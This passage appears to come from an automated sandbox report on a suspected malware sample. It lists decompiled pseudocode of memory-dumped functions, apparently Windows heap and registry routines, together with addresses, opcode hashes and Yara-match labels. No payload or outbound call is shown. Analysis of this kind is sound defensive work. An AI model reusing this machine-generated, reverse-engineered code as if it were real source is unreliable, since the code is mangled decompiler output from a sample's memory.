				_t124 = L03864620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03889800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E038895B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E038895D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L038677F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03889910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E038895D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x3937b9c; // 0x0
									_t92 = L03864620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03889910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0384A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E038DE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E038DE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E038895B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x038db8d9
0x038db8e4
0x00000000
0x038db8e6
0x038db8f3
0x038db8f5
0x038db8f5
0x038db8f8
0x038db920
0x038db924
0x038db936
0x038db939
0x038db93d
0x038db948
0x038db9a0
0x038db9a0
0x038db9a4
0x038db9bf
0x038db9c4
0x038db9c6
0x038db9cd
0x038db9d1
0x038dbad4
0x038dbad8
0x038dbada
0x038dbadc
0x038dbadc
0x038dbadf
0x038dbae0
0x038dbae2
0x038dbae4
0x038dbaec
0x038dbaee
0x038dbaf0
0x038dbaf0
0x038dbaec
0x038dbafb
0x038dbafc
0x038dbafe
0x038dbb01
0x038dbb01
0x00000000
0x038dbb06
0x038db9d7
0x038db9db
0x038db9db
0x038db9de
0x038db9de
0x038db9e4
0x038db9e7
0x038db9ea
0x038db9ec
0x038db9ef
0x038db9f3
0x038dba1b
0x038dba1b
0x038dba23
0x038dba24
0x038dba27
0x038dba2a
0x038dba2b
0x038dba2e
0x038dba30
0x038dba37
0x038dba3f
0x038dba9c
0x038dbaa2
0x038dbb13
0x038dbb15
0x038dbaae
0x038dbaae
0x038dbab3
0x038dbab5
0x038dbaba
0x038dbac8
0x038dbac8
0x038dbaba
0x038dbacd
0x038dbacf
0x00000000
0x038dbacf
0x038dbb1a
0x00000000
0x038dbb1c
0x038dbaa7
0x038dbb11
0x00000000
0x038dbb11
0x038dbaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x038dba41
0x038dba41
0x038dba41
0x038dba58
0x038dba5d
0x038dba62
0x00000000
0x00000000
0x038dba64
0x038dba67
0x038dba68
0x038dba69
0x038dba6c
0x038dba6f
0x038dba71
0x038dba78
0x038dba80
0x00000000
0x00000000
0x038dba90
0x038dba90
0x038dba97
0x00000000
0x038dba97
0x038db9f5
0x038db9f7
0x038db9f7
0x038db9fa
0x038dba03
0x038dba07
0x038dba0c
0x038dba10
0x038dba17
0x00000000
0x038db9f7
0x038db9a6
0x038db9a8
0x038db9af
0x038db9b3
0x00000000
0x00000000
0x038db9b9
0x00000000
0x038db9b9
0x038db94d
0x038db98f
0x038db995
0x038db999
0x038db960
0x038db967
0x038db968
0x038db96a
0x00000000
0x038db96a
0x038db99b
0x038db99e
0x00000000
0x00000000
0x00000000
0x038db99e
0x038db951
0x038db954
0x038db95a
0x038db95e
0x038db972
0x038db979
0x038db97d
0x038db97f
0x038db980
0x038db982
0x038db984
0x00000000
0x038db984
0x00000000
0x038db926
0x00000000
0x038db926

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f63afb466840d22c5dbe91f3a39327a9c7f2e60276462e08728d4ac1a61211f9
Instruction ID: 060c3450cdbe895a96bedaf8a79947995186eefaa5137b1df0ae4a5c2dc6e8eb
Opcode Fuzzy Hash: f63afb466840d22c5dbe91f3a39327a9c7f2e60276462e08728d4ac1a61211f9
Instruction Fuzzy Hash: A1713236200705AFD732DF99C840F66BBF5EF44720F2A45A8E656DB6A0EB74E940CB40

Uniqueness

Uniqueness Score: -1.00%

Function 03901002, Relevance: .2, Instructions: 198
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E03901002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x3935898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x39358b0 = _t128;
								 *0x39358b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x39358b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x39358bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x39358bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x39358b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x3935898 = 7;
										return _t75;
									} else {
										 *0x3935898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x3935898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}

0x03901002
0x0390100c
0x0390100f
0x03901012
0x03901018
0x00000000
0x0390102e
0x03901030
0x00000000
0x03901032
0x03901032
0x03901038
0x03901038
0x0390121e
0x039011ff
0x03901205
0x03901207
0x0390120c
0x0390120e
0x03901210
0x03901212
0x03901212
0x03901210
0x0390121c
0x0390121c
0x03901228
0x03901228
0x0390101c
0x0390101c
0x0390101c
0x0390101f
0x03901022
0x03901025
0x0390102c
0x0390102c
0x00000000
0x0390102c
0x03901027
0x0390102a
0x0390103f
0x0390103f
0x03901042
0x03901044
0x03901047
0x03901049
0x0390104c
0x0390104e
0x03901088
0x03901088
0x0390108a
0x0390108d
0x0390108f
0x03901091
0x03901091
0x03901093
0x03901095
0x03901097
0x039010c8
0x039010cb
0x039010ce
0x039010d0
0x039010f4
0x039010f4
0x039010fa
0x03901100
0x03901102
0x03901150
0x03901150
0x03901154
0x03901167
0x0390116a
0x0390116a
0x03901156
0x03901156
0x03901158
0x0390115b
0x0390115d
0x0390115f
0x0390115f
0x0390115f
0x03901162
0x03901162
0x0390116c
0x0390116f
0x03901171
0x0390117b
0x0390117b
0x0390117d
0x03901183
0x03901183
0x03901186
0x03901188
0x03901199
0x0390118a
0x0390118a
0x0390118c
0x0390118f
0x03901191
0x03901191
0x03901191
0x03901194
0x03901194
0x0390119c
0x039011a2
0x039011a8
0x039011ac
0x039011af
0x039011c7
0x039011b1
0x039011b1
0x039011b4
0x039011b7
0x039011b9
0x039011b9
0x039011b9
0x039011bc
0x039011c2
0x039011c2
0x039011cb
0x039011ce
0x039011d4
0x039011e7
0x039011ed
0x039011ef
0x00000000
0x00000000
0x039011f1
0x00000000
0x039011d6
0x039011d6
0x00000000
0x039011d6
0x039011d4
0x03901104
0x03901106
0x00000000
0x00000000
0x03901108
0x0390110c
0x0390111d
0x0390110e
0x0390110e
0x03901110
0x03901113
0x03901115
0x03901115
0x03901115
0x03901118
0x03901118
0x03901126
0x0390113a
0x0390113d
0x0390113f
0x00000000
0x03901141
0x03901141
0x00000000
0x03901141
0x0390113f
0x039010d6
0x039010d9
0x039010dd
0x039010e3
0x039010e6
0x039010e9
0x00000000
0x00000000
0x039010ee
0x039010f0
0x039010f2
0x00000000
0x00000000
0x00000000
0x039010f2
0x00000000
0x03901099
0x03901099
0x0390109c
0x0390109c
0x0390109e
0x039010a0
0x039010b3
0x039010a2
0x039010a2
0x039010a4
0x039010a7
0x039010a9
0x039010ab
0x039010ab
0x039010ab
0x039010ae
0x039010ae
0x039010b6
0x039010b9
0x00000000
0x00000000
0x039010be
0x039010c1
0x039010c3
0x00000000
0x00000000
0x00000000
0x039010c3
0x039010c5
0x00000000
0x039010c5
0x03901097
0x03901050
0x03901053
0x03901056
0x03901059
0x0390105c
0x0390105e
0x03901060
0x03901062
0x03901064
0x03901064
0x03901062
0x03901066
0x03901069
0x0390106b
0x0390106d
0x0390106f
0x03901076
0x03901076
0x03901076
0x00000000
0x03901076
0x03901071
0x03901074
0x00000000
0x00000000
0x00000000
0x03901074
0x03901079
0x03901079
0x0390107b
0x0390107b
0x0390107f
0x03901082
0x03901085
0x00000000
0x03901085
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22c4fbc1737596b08059014284d3045e54f5b8d4b362a68ba7729a751cdecb99
Instruction ID: 3d5921adebc67dd3e53de401f1799ad50c2e391e19baa781ba3bda49a4445f09
Opcode Fuzzy Hash: 22c4fbc1737596b08059014284d3045e54f5b8d4b362a68ba7729a751cdecb99
Instruction Fuzzy Hash: 25718C78A00762DFCB68CF5AC58067AF3F9FB48745B69486ED8828B6C0D771A950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1042D4B3, Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f12d16eb770c8712941d3d06b7ef8a80fc0b88e9028c3b55906925677f7432a
Instruction ID: 899a65d076d5251f20cd99bdc88e418ce9c8d15af6ae21099b85fdd0448b05b7
Opcode Fuzzy Hash: 2f12d16eb770c8712941d3d06b7ef8a80fc0b88e9028c3b55906925677f7432a
Instruction Fuzzy Hash: 6991CE72918386CFE716DF34E98AB413FF2F396314B89425EC4A297492D338255ACF85

Uniqueness

Uniqueness Score: -1.00%

Function 1042D29D, Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c8712d25b44f5231f46aa770dbd994803dab251ad4ad746feaa6fcd498462f
Instruction ID: 1f055644a16ff28786fe23a0db2639ffcd87817060404f5f93a6a1a9f940534b
Opcode Fuzzy Hash: 93c8712d25b44f5231f46aa770dbd994803dab251ad4ad746feaa6fcd498462f
Instruction Fuzzy Hash: 0B918932509396CFD716CF38ED8AA413FB2F382324B48435EC5A2574A6D338255ADF89

Uniqueness

Uniqueness Score: -1.00%

Function 1042CA46, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b8a944c4f3bca5c5da3352ff114f9b41c5274fe35ae923887e137d90e76d06
Instruction ID: 1b1ceacc9f7779beadaffe20b0744ce9aabd270a53264c5a07e9d42734089e59
Opcode Fuzzy Hash: f7b8a944c4f3bca5c5da3352ff114f9b41c5274fe35ae923887e137d90e76d06
Instruction Fuzzy Hash: 4C81CD72A18385CFD706CF34E99AB413FB2F382314B45425EC5E2A7492D778256ACF89

Uniqueness

Uniqueness Score: -1.00%

Function 10412D90, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 0ab3145c8842f185178762d78427b61ea2d5d8eb7fa4506e00ea0785f5ccec78
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: AC5173B3E14A214BD3188E09CD40631B792FFD8312B5B81BEDD199B357CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 038452A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E038452A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0385EEF0(0x39379a0);
					_t104 =  *0x3938210; // 0x3152d40
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0385EB70(_t93, 0x39379a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E03889890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0385EEF0(0x39379a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0385EB70(0, 0x39379a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x3152d4d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0387F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0385EEF0(0x39379a0);
									__eflags =  *0x3938210 - _t104; // 0x3152d40
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x3938210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E038C4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0385EB70(_t95, 0x39379a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E038895D0();
											L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E038895D0();
											L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0385EB70(_t93, 0x39379a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E038895D0();
										L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E038895D0();
										L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0387F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x038452a5
0x038452ad
0x038452b0
0x038452b3
0x038452b7
0x038452ba
0x038452bf
0x038452c4
0x038452cc
0x00000000
0x00000000
0x038452ce
0x038452d9
0x038452dd
0x038452e7
0x038452f7
0x038452f9
0x038452fd
0x038a0dcf
0x038a0dd5
0x038a0dd6
0x038a0dd7
0x038a0dd8
0x038a0dd9
0x038a0dde
0x038a0ddf
0x038a0de0
0x038a0de1
0x038a0de2
0x038a0de5
0x038a0dea
0x038a0dec
0x038a0f60
0x038a0f64
0x038a0f70
0x038a0f76
0x038a0f79
0x038a0f79
0x00000000
0x038a0f64
0x038a0df2
0x038a0df7
0x038a0e04
0x038a0e0d
0x038a0e0d
0x038a0e10
0x038a0e1a
0x038a0e1c
0x038a0e4c
0x038a0e52
0x038a0e61
0x038a0e67
0x038a0e6b
0x038a0e70
0x038a0e76
0x038a0ed7
0x038a0edc
0x038a0ee0
0x038a0ee6
0x038a0eea
0x038a0eed
0x038a0ef0
0x038a0ef3
0x038a0ef6
0x038a0ef9
0x038a0efe
0x038a0f01
0x038a0f01
0x038a0f0b
0x038a0f12
0x038a0f16
0x038a0f18
0x038a0f1b
0x038a0f2c
0x038a0f31
0x038a0f31
0x038a0f35
0x038a0f39
0x038a0f3a
0x038a0f3c
0x038a0f3f
0x038a0f50
0x038a0f55
0x038a0f55
0x038a0f59
0x038452eb
0x038452f1
0x038452f1
0x038a0e7d
0x038a0e84
0x038a0e88
0x038a0e8a
0x038a0e8d
0x038a0e9e
0x038a0ea3
0x038a0ea3
0x038a0ea7
0x038a0eaf
0x038a0eb3
0x038a0eb9
0x038a0eb9
0x038a0ebc
0x038a0ecd
0x038a0ecd
0x00000000
0x038a0eb3
0x038a0e21
0x038a0e2b
0x038a0e2f
0x038a0e30
0x038a0e3a
0x038a0e3f
0x038a0e41
0x00000000
0x00000000
0x038a0e47
0x00000000
0x038a0e47
0x038a0df9
0x038a0dfe
0x00000000
0x00000000
0x00000000
0x038a0dfe
0x03845303
0x03845307
0x00000000
0x03845309
0x00000000
0x03845309
0x03845307
0x038452e9
0x038452e9
0x00000000
0x038452e9
0x0384530e
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d7bc9e4c7126a8367bc816066967cb6e42e3883c257ec3d4b903117278d0778
Instruction ID: f01d0a852f3745bc6d66b124b0fdfdc9569c231a3891da73be3e1146186d5d13
Opcode Fuzzy Hash: 1d7bc9e4c7126a8367bc816066967cb6e42e3883c257ec3d4b903117278d0778
